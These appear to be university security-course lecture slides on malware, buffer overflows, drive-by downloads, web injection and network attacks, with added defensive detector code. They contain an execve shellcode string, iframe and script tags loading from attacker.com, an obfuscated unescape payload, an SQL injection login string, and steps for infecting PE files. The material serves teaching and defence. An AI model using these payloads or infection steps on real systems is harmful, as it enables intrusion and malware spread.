A non-governmental, peer-review mechanism. It is outcomes-based, oriented toward students' learning outcomes, to ensure the department's educational quality.
It confirms that the department can continuously achieve its self-defined educational objectives and that its graduates possess the core competencies their profession requires.
The accreditation mechanism maintains educational quality and pursues continuous improvement.
A certain level of educational quality helps the department recruit students at home and abroad, and its graduates' degrees gain international recognition; since 2007 the accreditation body has been a member of the Washington Accord, the international engineering education accreditation agreement.
University goals: pursue academic excellence and advance human well-being; balance liberal education with specialization and cultivate leaders; open up cutting-edge fields and rank among first-class universities.

Educational objectives by program (one slide each: undergraduate, CS master's, software engineering master's, in-service master's, PhD):
- Undergraduate: train the professional ability to think independently; foster a spirit of mutual help through teamwork; build an open and diverse attitude toward learning; cultivate the humanistic qualities of service and care; broaden an innovative, forward-looking international outlook.
- CS master's: cultivate the professional ability to apply information technology to solve problems; develop abilities in project development, communication and coordination; build an open and diverse attitude toward lifelong learning; broaden an innovative, forward-looking international outlook.
- Software engineering master's: cultivate the professional ability to develop software using software engineering; develop abilities in cross-disciplinary project development, communication and coordination; build an open and diverse attitude toward lifelong learning; broaden an innovative, forward-looking international outlook.
- In-service master's: cultivate the professional ability to apply information technology to solve problems; develop skills in cross-disciplinary project development, communication and coordination; cultivate talent with the ability to integrate software and hardware creatively.
- PhD: cultivate comprehensive professional knowledge of information science; train professional ability in cutting-edge information technology; develop abilities in cross-disciplinary project development, communication and coordination; build an open and diverse attitude toward lifelong learning; broaden an innovative, forward-looking international outlook.
Platforms covered: desktop, smartphone, cloud, infrastructure (router, DNS server), M2M, smart grid.

Course topics:
- Malware: logic bombs, key loggers, dialers, URL injection, Trojan horses, and spyware.
- Internet worms, buffer overflow attacks, and heap overflow attacks.
- Return-into-libc attacks, BOA countermeasures, and botnets.
- Disk layout, BIOS, and viruses; macro viruses and boot record viruses; backdoors, sniffers, rootkits for Linux/Unix.
- Magic cookies and web bugs; HTTP cookies; cross-site scripting (XSS) and SQL injection; SQL injection and account stealing; account stealing, TCP session hijacking; (New Year: the school is not in session); ARP spoofing and format string attacks; DoS/DDoS attacks.
Trojan Horse [Wikipedia]

In the context of computer software, a Trojan horse is a malicious program that is disguised as or embedded within legitimate software.
Trojans use false and fake names to trick users into executing them.
- These strategies are often collectively termed social engineering.
A Trojan is designed to operate with functions unknown to the victim. The useful, or seemingly useful, functions serve as camouflage for these undesired functions.
Trojans arrive through websites, e-mails, and downloaded files.
Spyware [Wikipedia]

Spyware is computer software that is installed surreptitiously on a personal computer to
- monitor,
- intercept, or
- take partial control over
the user's interaction with the computer, without the user's informed consent.
Spyware does not directly spread in the manner of a computer virus or worm:
- generally, an infected system does not attempt to transmit the infection to other computers.
Instead, spyware gets onto a system
- through deception of the user, or
- through exploitation of software vulnerabilities.
Malicious websites may attempt to install spyware on readers' computers.
- (Screenshot caption) In this screenshot a website has triggered a pop-up that offers spyware in the guise of a security upgrade.
(Screenshot caption) The BearShare file-trading program, "supported" by WhenU spyware. In order to install BearShare, users must agree to install "the SAVE! bundle" from WhenU. The installer provides only a tiny window in which to read the lengthy license agreement. Although the installer claims otherwise, the software transmits users' browsing activity to WhenU servers.
Stack Smashing Attacks

Overwrite control transfer structures, such as return addresses or function pointers, to redirect program execution flow to the desired code.
Attack strings carry both the code and the address(es) of the code entry point.
26
kernel address space
Libraries
heap
BSS
data
code
high address
low address
stack
main()
{ :
G(1);
}
void G(int a)
{
:
H(3);
}
void H(int c)
{
:
}
env, argv, argc
EIP
main
G
H
27
H's stack frame (slide diagram, from high to low address): G's stack frame, then the argument b, the return address add_g, the saved frame pointer (address of G's frame), then c[99] down to c[0] and i; ebp and esp point into H's frame. With the input string "abc", the characters a, b, c are stored at c[0], c[1], c[2] (addresses 0xaba, 0xabb, 0xabc on the slide).

```c
#include <stdio.h>

void G(int a)
{
    H(3);
    /* add_g: the return address pushed by the call above points here */
}

void H(int b)
{
    char c[100];
    int i = 0;
    /* no bound check: input longer than 100 bytes keeps writing past c[99]
       (the slide writes getch(); getchar() is the standard call that returns EOF) */
    while ((c[i++] = getchar()) != EOF)
    {
    }
}
```
The same frame under attack (slide diagram): the attack string "xx Injected Code x y 0xabc" is 108 bytes long (x: 1 byte, y: 4 bytes). It fills c[0..99] with two x bytes, the injected code and padding x; the 4-byte y lands on the saved frame pointer (address of G's frame), and 0xabc overwrites the return address add_g. Since c[0] sits at 0xaba, the injected code begins at 0xabc, so when H returns, execution continues in the injected code instead of at add_g.
The attacked programs usually have root privilege; therefore, the injected code is executed with root privilege.
The injected code is already in machine instruction form; therefore, a CPU can directly execute it.
- However, the above fact also means that the injected code must match the CPU type of the attacked host.
Usually the injected code will fork a shell; hence, after an attack, an attacker could have a root shell.
In order to be able to interact with the newly forked root shell, the injected code usually needs to execute the following two steps:
- Open a socket.
- Redirect the standard input and output of the newly forked root shell to the socket.

Shellcode string shown on the slide:

```c
char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
```

Sources of published exploit code named on the slide: Exploit World, MILWORM, Metasploit, Securiteam.
Heap/Data/BSS Overflow Attacks

Similarly to stack smashing attacks, attackers overflow a sensitive data structure by providing more data than an adjacent buffer can store, so that the excess overwrites the sensitive data structure.
- The sensitive data structure may contain a function pointer, a pointer to a string, and so on.
Both the buffer and the sensitive data structure may be located in the heap, data, or BSS section.
The heap is an area in memory that is dynamically allocated by the application, using a call such as malloc().
- On most systems, the heap grows up (towards higher addresses).
The data section is initialized at compile time. The BSS section contains uninitialized data and is allocated at run time.
- Until it is written to, it remains zeroed (or at least from the application's point of view).
Heap buffer adjacent to sensitive data (the slide elides the rest of main):

```c
#include <stdio.h>
#include <stdlib.h>

#define BUFSIZE 16

int main(void)
{
    int i = 0;
    char *buf1 = (char *)malloc(BUFSIZE);
    char *buf2 = (char *)malloc(BUFSIZE);
    /* ... */
    /* no bound check: input longer than BUFSIZE runs past buf1 into buf2 */
    while ((*(buf1 + i) = getchar()) != EOF)
        i++;
    /* ... */
    return 0;
}
```

(Slide diagram: buf1 and buf2 are adjacent on the heap, with buf2 holding the sensitive data.)

Static buffer adjacent to a file-name pointer:

```c
#include <stdio.h>

#define BUFSIZE 16

int main(int argc, char **argv)
{
    FILE *tmpfd;
    static char buf[BUFSIZE], *tmpfile;
    /* ... */
    tmpfile = "/tmp/vulprog.tmp";
    gets(buf);                      /* unbounded read into the static buffer */
    tmpfd = fopen(tmpfile, "w");
    /* ... */
    return 0;
}
```

(Slide diagram: buf lies directly before the tmpfile pointer; overflowing buf overwrites the pointer, so fopen() opens a different path, "/etc/passwd" on the slide, instead of "/tmp/vulprog.tmp".)
Heap Spray and Drive-by Download

Heap spraying is a technique used in exploits to facilitate arbitrary code execution.
Heap spraying is a security attack using a strategy of allocating many objects containing the attacker's exploit code in an application's heap.
Heap spraying requires that an attacker use another memory corruption exploit to trigger an attack, but the act of spraying greatly simplifies the attack and increases its likelihood of success.

```javascript
memory = new Array();
for (i = 0; i < 700; i++)
    memory[i] = block + shellcode;
```

A drive-by download is a download of spyware, a computer virus or any kind of malware that happens without the knowledge of the user.
Drive-by downloads may happen by
- visiting a website,
- viewing an e-mail message, or
- clicking on a deceptive popup window.
Drive-by download (two slide diagrams, client side / WWW): a vulnerable browser fetches a page from a good web server into which a hidden frame or script pointing at a malicious web server (attacker.com/bad.htm) has been injected; in the second diagram the malicious page redirects further to attacker2.com and is obfuscated with document.write(unescape(...)).

Content injected into the good page:

```html
<iframe src="http://attacker.com/bad.htm" height=0 width=0></iframe>
<script src=http://attacker.com/bad.js></script>
```

Obfuscated script on the malicious server (truncated on the slide):

```javascript
document.write(unescape("%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%0D%0A%69%66%28%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%22%5C%78%36%44%5C%78%37%33%5C%78% ………
```
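To show what a content filter or an analyst sees when peeling the obfuscation above, the following added example (my code, not from the slides or any cited work) decodes the two layers used on the slide, JavaScript unescape() percent-encoding and \xHH string escapes, and lists the drive-by indicators found in a constructed page: the hidden iframe, a script loaded from another host, document.write(unescape(...)), and user-agent sniffing in the decoded payload. The percent-encoded string is the slide's own prefix cut at a whole escape; the page around it, the origin host name and the indicator names are constructed.

```python
"""Decode the obfuscation layers of a drive-by download page and list the
indicators a content filter would flag.  Added example; the sample page is
constructed around the slide's snippets and is not a captured page."""
import re
from urllib.parse import unquote

# The slide's percent-encoded payload, cut at a whole escape (it is truncated on the slide).
SLIDE_ENCODED = ("%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61"
                 "%73%63%72%69%70%74%22%3E%0D%0A%69%66%28%6E%61%76%69%67%61%74%6F%72"
                 "%2E%75%73%65%72%41%67%65%6E%74%2E%74%6F%4C%6F%77%65%72%43%61%73%65"
                 "%28%29%2E%69%6E%64%65%78%4F%66%28%22%5C%78%36%44%5C%78%37%33")

# Constructed "good" page after injection: hidden iframe, remote script, obfuscated writer.
SAMPLE_PAGE = (
    '<html><body>Welcome to the good site'
    '<iframe src="http://attacker.com/bad.htm" height=0 width=0></iframe>'
    '<script src=http://attacker.com/bad.js></script>'
    '<script>document.write(unescape("' + SLIDE_ENCODED + '"))</script>'
    '</body></html>'
)

JS_HEX = re.compile(r'\\x([0-9A-Fa-f]{2})')
WRITE_UNESCAPE = re.compile(r'document\.write\(unescape\("([^"]*)"\)\)')
HIDDEN_FRAME = re.compile(r'<iframe[^>]*\b(?:height|width)\s*=\s*["\']?0\b', re.I)
SRC_ATTR = re.compile(r'<(?:iframe|script)[^>]*\bsrc\s*=\s*["\']?([^\s"\'>]+)', re.I)

def decode_layers(text):
    """Peel JS unescape() (percent-encoding), then \\xHH string escapes."""
    layer1 = unquote(text)
    layer2 = JS_HEX.sub(lambda m: chr(int(m.group(1), 16)), layer1)
    return layer1, layer2

def unescape_payloads(page):
    """Decoded content of every document.write(unescape("...")) call on the page."""
    return [decode_layers(enc)[1] for enc in WRITE_UNESCAPE.findall(page)]

def drive_by_indicators(page, origin_host):
    """Set of indicator names found on the page; empty when nothing is suspicious."""
    found = set()
    if HIDDEN_FRAME.search(page):
        found.add("hidden-iframe")
    for src in SRC_ATTR.findall(page):
        host = re.sub(r'^https?://', '', src, flags=re.I).split('/')[0]
        if host and host != origin_host:
            found.add("external-resource:" + host)
    for decoded in unescape_payloads(page):
        found.add("obfuscated-document.write")
        if "<script" in decoded.lower():
            found.add("decoded-script-tag")
        if "navigator.useragent" in decoded.lower():
            found.add("browser-fingerprinting")
    return found
```

Nested unescape() layers are handled by feeding decode_layers() its own output until the text stops changing; the host comparison assumes the caller knows which host served the page.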
Botnet [Trend Micro]

A botnet (zombie army or drone army) refers to a pool of compromised computers that are under the command of a single attacker, or a small group of attackers, known as a botmaster.
Aspects covered: attacking behavior, C&C models, rally mechanisms, communication protocols, observable botnet activities, evasion techniques.
Fast Flux [Riden][SSAC]

Fast-flux service networks are networks of compromised computer systems with public DNS records that are constantly changing, in some cases every few minutes.
These constantly changing architectures make it much more difficult to track down criminal activities and shut down their operations.
The goal of fast-flux is for a fully qualified domain name (such as www.example.com) to have multiple (hundreds or even thousands of) IP addresses assigned to it.
These IP addresses are swapped in and out of flux with extreme frequency, using a combination of
- round-robin IP addresses and
- a very short Time-To-Live (TTL) for any given DNS Resource Record (RR).
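A detector for the DNS pattern just described, added here as an example (my code, not from the slides or from the Riden/SSAC reports); the lookup records, thresholds and domain names are constructed. It groups repeated lookups of a name and flags names whose records combine a short TTL, many distinct addresses spread across many /16 networks, and high churn between lookups.

```python
"""Flag fast-flux candidates from repeated DNS lookups.  Added example; the
observations below are constructed, not captured resolver data."""
import ipaddress
from collections import defaultdict

# Constructed lookups: (domain, minute observed, TTL in seconds, A records returned)
OBSERVATIONS = [
    ("flux.example", 0, 300, ["198.51.100.7", "203.0.113.21", "192.0.2.44", "198.18.4.9", "100.64.3.3"]),
    ("flux.example", 5, 300, ["203.0.113.88", "192.0.2.120", "198.18.77.1", "100.64.9.9", "198.51.100.200"]),
    ("flux.example", 10, 300, ["192.0.2.201", "198.18.120.5", "100.64.44.44", "203.0.113.2", "198.51.100.33"]),
    ("stable.example", 0, 86400, ["192.0.2.10", "192.0.2.11"]),
    ("stable.example", 5, 86400, ["192.0.2.11", "192.0.2.10"]),
]

def summarize(observations):
    """Per domain: largest TTL seen, distinct IPs, distinct /16 networks, churn."""
    ttl = {}
    lookups = defaultdict(list)
    for domain, _, t, records in observations:
        ttl[domain] = max(ttl.get(domain, 0), t)
        lookups[domain].append(set(records))
    summary = {}
    for domain, sets in lookups.items():
        union = set().union(*sets)
        nets = {ipaddress.ip_network(ip + "/16", strict=False) for ip in union}
        # churn: fraction of addresses that showed up in only one of the lookups
        churn = sum(1 for ip in union if sum(ip in s for s in sets) == 1) / len(union)
        summary[domain] = {"ttl": ttl[domain], "ips": len(union),
                           "nets16": len(nets), "churn": churn}
    return summary

def is_fast_flux(stats, max_ttl=600, min_ips=10, min_nets=4, min_churn=0.5):
    """All four signs together: short TTL, many IPs, wide network spread, high churn."""
    return (stats["ttl"] <= max_ttl and stats["ips"] >= min_ips
            and stats["nets16"] >= min_nets and stats["churn"] >= min_churn)

def fast_flux_domains(observations):
    return sorted(d for d, s in summarize(observations).items() if is_fast_flux(s))
```

A production version replaces the /16 heuristic with ASN lookups and tunes the thresholds per resolver; a CDN also rotates addresses under short TTLs, but its addresses stay inside a few networks, which is why the spread test is kept alongside the count.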
Inject Virus

Step 1: Find the section header i that has the largest PointerToRawData value among all the section headers. In other words, its corresponding section is the last section in this file. (Slide diagram: each section header is 40 = 28h bytes.)
Step 2: Add the size of the virus.
Step 3: According to the value of FileAlignment in the structure IMAGE_OPTIONAL_HEADER, round VirtualSize, then save the result to this field. (Slide diagram annotations: 40 bytes = 28h, 16 bytes = 10h.)
Step 4: VirtualAddress + old value of VirtualSize; then save the result to AddressOfEntryPoint.
Step 5: Add (new SizeOfRawData - old SizeOfRawData).
Step 6: Make the section executable, code and writable, so OR its Characteristics with 0x00000020 (code), 0x20000000 (executable) and 0x80000000 (writable).
Step 7: Append the virus to this file.
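The steps above leave a pattern a scanner can look for: an entry point that lands inside the last section of the file, in a section marked both writable and executable. The following added example (my code, not from the slides) parses PE32 section headers and reports those two conditions. The two PE images are constructed in memory with struct, header-only; the section names, offsets and the build_pe() helper are assumptions made for the demonstration.

```python
"""Report whether a PE32 entry point sits in the last, writable-and-executable
section.  Added example; both images are constructed header-only stubs."""
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_HEADER = "<8sIIIIIIHHI"          # IMAGE_SECTION_HEADER: 40 bytes

def parse_sections(data):
    """Return (AddressOfEntryPoint, [section dicts]) from a PE32 image in memory."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20                                       # IMAGE_OPTIONAL_HEADER
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]   # offset 16 = 10h
    sections = []
    for i in range(nsections):
        f = struct.unpack_from(SECTION_HEADER, data, opt + opt_size + i * 40)
        sections.append({"name": f[0].rstrip(b"\0").decode(), "vsize": f[1],
                         "vaddr": f[2], "rawsize": f[3], "rawptr": f[4], "chars": f[9]})
    return entry_rva, sections

def entry_section(data):
    """The section whose virtual range contains the entry point, plus all sections."""
    entry_rva, sections = parse_sections(data)
    for s in sections:
        if s["vaddr"] <= entry_rva < s["vaddr"] + max(s["vsize"], s["rawsize"]):
            return s, sections
    return None, sections

def suspicious_entry(data):
    """Reasons a scanner heuristic would raise about the entry-point section."""
    sec, sections = entry_section(data)
    if sec is None:
        return ["entry point outside every section"]
    reasons = []
    last = max(sections, key=lambda s: s["rawptr"])     # same rule as step 1
    if sec is last and len(sections) > 1:
        reasons.append("entry point in last section (%s)" % sec["name"])
    if sec["chars"] & IMAGE_SCN_MEM_WRITE and sec["chars"] & IMAGE_SCN_MEM_EXECUTE:
        reasons.append("entry section is writable and executable")
    return reasons

def build_pe(sections, entry_rva, file_align=0x200):
    """Constructed minimal PE32 header (DOS stub, signature, COFF, optional, sections)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                  # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)             # AddressOfEntryPoint
    struct.pack_into("<I", opt, 36, file_align)            # FileAlignment
    hdrs = b"".join(struct.pack(SECTION_HEADER, n, vs, va, rs, rp, 0, 0, 0, 0, ch)
                    for n, vs, va, rs, rp, ch in sections)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + hdrs

TEXT = (b".text", 0x1000, 0x1000, 0x1000, 0x400, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
CLEAN = build_pe([TEXT, (b".data", 0x200, 0x2000, 0x200, 0x1400, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)],
                 entry_rva=0x1010)
# Constructed image after the steps above: .data grown, now code+execute+write, entry moved into it
INFECTED = build_pe([TEXT, (b".data", 0x400, 0x2000, 0x400, 0x1400,
                            IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE)],
                    entry_rva=0x2200)
```

The check reads only the headers, so it runs on a whole directory of binaries cheaply; it is a heuristic, and packers legitimately trip it, so treat a hit as a reason to look further rather than a verdict.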
BackDoors

A piece of code written into applications or operating systems to grant programmers access to programs without requiring them to go through the normal methods of access authentication.
Rootkit

The name rootkit is a combination of two words, "root" and "kit".
- "Root" was taken from "root", the name of the UNIX administrator account, which has the highest access level in UNIX environments.
- "Kit" can be read as tools.
From these words we can interpret rootkit as
- tools, or
- a collection of tools
that enable an attacker to keep root power on the compromised system.
In order to keep continuous power over the compromised server, the attacker must hide their presence from being detected by the administrator.
Cross-site Scripting

Persistent Cross-Site Scripting [Raymond Mui et al.] (slide diagram):
1. Alice submits a message containing <script>…</script> to the web server (PHP interpreter).
2. The server stores it in the DBMS: insert into messages values('Alice', '<script> …'); (messages table: user = Alice, message = <script> …).
3. Bonnie later requests the page; the server runs select * from messages … and emits <html>…Alice wrote <script>…</script> ….
4. Bonnie's browser (JavaScript) executes the script with the privileges of the origin site.
Cross-site Request Forgery [Wikipedia]

Cross-site request forgery, also known as one-click attack or session riding and abbreviated as CSRF ("sea-surf") or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.
SQL Injection [SK]

Many web pages take parameters from web users and make SQL queries to the database.
- Take for instance when a user logs in to a web page: the web page accepts the user name and password and makes an SQL query to the database to check whether the user has a valid name and password.
With SQL injection, it is possible for us to send a crafted user name and/or password field that will change the SQL query and thus grant us something else.
Start with the single quote trick. Input something like hi' or 1=1-- into login, or password, or even in the URL. Example:
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
- http://duck/index.asp?id=hi' or 1=1--
If luck is on your side, you will get login without any login name or password.
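Both the stored cross-site scripting flow and the login query above come down to untrusted text being pasted into a language the server then interprets (HTML in one case, SQL in the other). The following added example (my code, not from the slides or the cited sources) builds both on one in-memory sqlite3 database: a login check written with string concatenation beside its parameterized form, and a message board rendered with and without output encoding. Table names, the user record and the script payload are constructed; the login payload is the slide's hi' or 1=1--.

```python
"""Stored XSS and SQL injection on one tiny sqlite3 message board and login,
with the unsafe and the fixed version of each side by side.  Added example;
schema, user record and payloads are constructed."""
import html
import sqlite3

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT)")
    db.execute("CREATE TABLE messages (user TEXT, message TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 's3cret')")   # constructed account
    return db

# --- SQL injection: the login check from the slides ---------------------------
def login_vulnerable(db, name, password):
    # String concatenation: a quote in the input closes the literal and "--"
    # comments out the rest of the statement, including the password test.
    sql = "SELECT name FROM users WHERE name = '%s' AND password = '%s'" % (name, password)
    return db.execute(sql).fetchone() is not None

def login_safe(db, name, password):
    # Bound parameters: the values travel separately and are never parsed as SQL.
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    return db.execute(sql, (name, password)).fetchone() is not None

# --- Stored XSS: the message board from the diagram ----------------------------
def store_message(db, user, message):
    db.execute("INSERT INTO messages VALUES (?, ?)", (user, message))

def render_vulnerable(db):
    # Stored text is placed into the page verbatim, so Alice's <script> runs
    # in every reader's browser with the origin site's privileges.
    return "".join("<p>%s wrote %s</p>" % row
                   for row in db.execute("SELECT user, message FROM messages"))

def render_safe(db):
    # Output encoding: the same text is shown as text, not parsed as markup.
    return "".join("<p>%s wrote %s</p>" % (html.escape(u), html.escape(m))
                   for u, m in db.execute("SELECT user, message FROM messages"))

def demo():
    """Run the four checks and report which variants the payloads get through."""
    db = make_db()
    payload = "hi' or 1=1--"                      # the slide's input
    store_message(db, "Alice", "<script>alert(1)</script>")
    return {
        "vulnerable_login_bypassed": login_vulnerable(db, payload, payload),
        "safe_login_bypassed": login_safe(db, payload, payload),
        "script_in_vulnerable_page": "<script>" in render_vulnerable(db),
        "script_in_safe_page": "<script>" in render_safe(db),
    }
```

The two fixes are the same idea applied to two interpreters: keep data and code apart by handing the data to the interpreter through a channel that cannot be mistaken for syntax (bound parameters for SQL, entity encoding for HTML).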
MA Simulation

(Slide sequence, five diagrams.) Host A sends segments a to h to Host B; A's sending window and B's receiving window advance as segments are acknowledged (sequence numbers 100 and 600 are marked). An attacker then injects an IP packet into the connection. Host A closes its socket due to receiving a strange response from Host B, and the last diagram shows an RST.
ARP Spoofing

The Address Resolution Protocol is used by each host on an IP network to map local IP addresses to hardware addresses or MAC addresses.
Here is a quick look at how this protocol works.
- Say that Host A (IP address 192.168.1.100) wants to send data to Host B (IP address 192.168.1.250). No prior communications have occurred between Hosts A and B, so the ARP table entries for Host B on Host A are empty.
- Host A broadcasts an ARP request packet indicating that the owner of the IP address 192.168.1.250 should respond to Host A at 192.168.1.100 with its MAC address. The broadcast packet is sent to every machine in the network segment, and only the true owner of the IP address 192.168.1.250 should respond.
- All other hosts discard this request packet, but Host A receives an ARP reply packet from Host B indicating that its MAC address is BB:BB:BB:BB:BB:BB. Host A updates its ARP table and can now send data to Host B.
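The exchange above is what a legitimate ARP reply looks like, and spoofing shows up as departures from it. The following added example (my code, in the spirit of arpwatch, not from the slides) replays a constructed trace built around the slide's two hosts and flags three symptoms: a reply nobody asked for, an IP whose MAC changes, and one MAC claiming several IPs. The third host, its address and the MAC CC:CC:CC:CC:CC:CC are constructed.

```python
"""Passive ARP monitor: learn IP-to-MAC bindings from traffic and alert on the
symptoms of ARP spoofing.  Added example; the trace is constructed."""
from collections import defaultdict

# Constructed trace of (op, sender_ip, sender_mac, target_ip) as seen on the segment.
TRACE = [
    ("request", "192.168.1.100", "AA:AA:AA:AA:AA:AA", "192.168.1.250"),
    ("reply",   "192.168.1.250", "BB:BB:BB:BB:BB:BB", "192.168.1.100"),   # answers the request
    ("reply",   "192.168.1.250", "CC:CC:CC:CC:CC:CC", "192.168.1.100"),   # same IP, new MAC, unasked
    ("reply",   "192.168.1.1",   "CC:CC:CC:CC:CC:CC", "192.168.1.100"),   # CC also claims the gateway
]

def analyze_arp(trace):
    """Return (learned table {ip: first MAC seen}, list of alert strings)."""
    table = {}
    ips_by_mac = defaultdict(set)
    pending = defaultdict(set)            # ip asked about -> set of hosts that asked
    alerts = []
    for op, sip, smac, tip in trace:
        smac = smac.upper()
        if op == "request":
            pending[tip].add(sip)
            continue
        # A reply is solicited only if the target recently asked about this sender IP.
        if tip not in pending.get(sip, ()):
            alerts.append("unsolicited reply: %s claims %s" % (smac, sip))
        else:
            pending[sip].discard(tip)
        # Keep the first binding; a later reply with another MAC is the flip-flop sign.
        if sip in table and table[sip] != smac:
            alerts.append("changed MAC for %s: %s -> %s" % (sip, table[sip], smac))
        table.setdefault(sip, smac)
        ips_by_mac[smac].add(sip)
        if len(ips_by_mac[smac]) > 1:
            alerts.append("%s claims multiple IPs: %s" % (smac, ", ".join(sorted(ips_by_mac[smac]))))
    return table, alerts
```

DHCP churn and failover pairs also produce MAC changes, so the changed-MAC alert is usually compared against a DHCP lease log before escalation; the unsolicited-reply and multiple-IP alerts have fewer benign causes.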
Denial of Service (DoS) Attacks and Distributed Denial of Service (DDoS) Attacks

A DoS/DDoS attack is a type of attack technique that works
- by saturating the victim system with enormous network traffic to the point of unresponsiveness to legitimate users, or
- by crashing the victim system so that it is no longer available to legitimate users.
Flood attacks:
- Smurf flood attack
- TCP SYN flood attack
- UDP flood attack
- ICMP flood attack
Malformed packet attacks:
- Ping of Death attack
- Chargen attack
- TearDrop attack
- Land attack
(Slide diagram, flood amplification) Host A sends packets labelled V to hosts 1, 2, 3 and 4; their replies (VVVV) all arrive at host V.
(Slide diagram, DDoS hierarchy) attacker, then three masters, then eight slaves, then the victim.
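Of the flood attacks listed, the TCP SYN flood has the clearest network-side signature: many SYNs from a source that never completes the handshake. The following added example (my code, not from the slides) counts SYNs and completing ACKs per source inside a time window and flags sources whose half-open count exceeds both an absolute and a ratio threshold. The connection records and the thresholds are constructed.

```python
"""SYN flood detection from handshake records: per source, how many SYNs in a
window were never followed by the completing ACK.  Added example; the records
are constructed."""
from collections import defaultdict

# Constructed records: (second, event, src_ip, dst_port).  "SYN" is the client's
# SYN; "ACK" is the same client's final handshake ACK on that port.
RECORDS = [
    (1, "SYN", "198.51.100.7", 80), (1, "ACK", "198.51.100.7", 80),
    (2, "SYN", "198.51.100.7", 80), (2, "ACK", "198.51.100.7", 80),
] + [(t // 40, "SYN", "203.0.113.9", 80) for t in range(200)]   # 200 SYNs in 5 s, no ACKs

def half_open_by_source(records, window_start, window_len):
    """{src: (syns, half_open)} for records with window_start <= second < window_start + window_len."""
    syns = defaultdict(int)
    acks = defaultdict(int)
    for sec, event, src, _ in records:
        if not (window_start <= sec < window_start + window_len):
            continue
        if event == "SYN":
            syns[src] += 1
        elif event == "ACK":
            acks[src] += 1
    return {src: (n, max(n - acks[src], 0)) for src, n in syns.items()}

def syn_flood_sources(records, window_start=0, window_len=10, min_syns=100, min_ratio=0.9):
    """Sources whose half-open SYNs in the window pass both thresholds, sorted."""
    flagged = []
    for src, (n, half) in half_open_by_source(records, window_start, window_len).items():
        if n >= min_syns and half / n >= min_ratio:
            flagged.append(src)
    return sorted(flagged)
```

Floods with spoofed, rotating source addresses defeat per-source counting; for those, aggregate on the destination port instead and compare the half-open total against the listen backlog, which is the resource the attack actually exhausts.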
Format String Attacks

(Slide diagram) The format string holds b bytes followed by the address of the string of interest and contains the directives "b %c %s"; the diagram shows the resulting output of printf(). Assume the format string is stored above printf()'s activation record.